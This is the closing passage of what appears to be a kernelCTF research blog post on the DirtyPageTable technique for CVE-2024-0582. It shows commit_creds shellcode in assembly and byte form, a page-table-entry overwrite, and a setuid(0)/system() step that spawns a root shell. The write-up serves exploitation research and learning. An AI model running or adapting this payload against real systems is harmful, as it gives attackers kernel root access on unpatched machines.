[figure: leaked physkBase value]

After that, I wrote a small shellcode into __sys_setuid, which calls commit_creds(&init_cred):

lea rcx, [rip-7]          ; rcx = address of this shellcode (this lea is 7 bytes long)
lea rdi, [rcx+0x2a75be0]  ; rdi = &init_cred (offset specific to the target kernel build)
lea r10, [rcx+0x1ca30]    ; r10 = commit_creds (offset specific to the target kernel build)
call r10                  ; commit_creds(&init_cred)
ret
*pte = (physkBase + 0x1f8000) | 0x8000000000000067;
memcpy(target + 0x360,
"\x48\x8D\x0D\xF9\xFF\xFF\xFF\x48\x8D\xB9\xE0\x5B\xA7\x02\x4C\x8D\x91"
"\x30\xCA\x01\x00\x41\xFF\xD2\xC3",
26);
if (setuid(0) == 0) {
system("mount -t devtmpfs devtmpfs /dev ; cat /dev/vdb ; bash");
}

On the kernelCTF platform, I can use the devtmpfs mount trick instead of escaping the container.
[figure: shell obtained after the exploit succeeds]

Final words

This is my research on the DirtyPageTable technique, applied to CVE-2024-0582.

If you want to learn more about the CVE, you can check this excellent blog:
https://blog.exodusintel.com/2024/03/27/mind-the-patch-gap-exploiting-an-io_uring-vulnerability-in-ubuntu/

Credit for the kernel-physical-address leak trick goes to shift_crops and ptr-yudai. Since neither of them explains in detail why those magic numbers exist, this blog is the result of my curiosity.

LOL, @shift_crops followed me back on X but did not reply to my messages. So please reply to my messages if you see this blog, @shift_crops :(.
[screenshot from X]

I'm still new to Linux kernel exploitation. Please let me know if you see something wrong in this blog.

Cheers.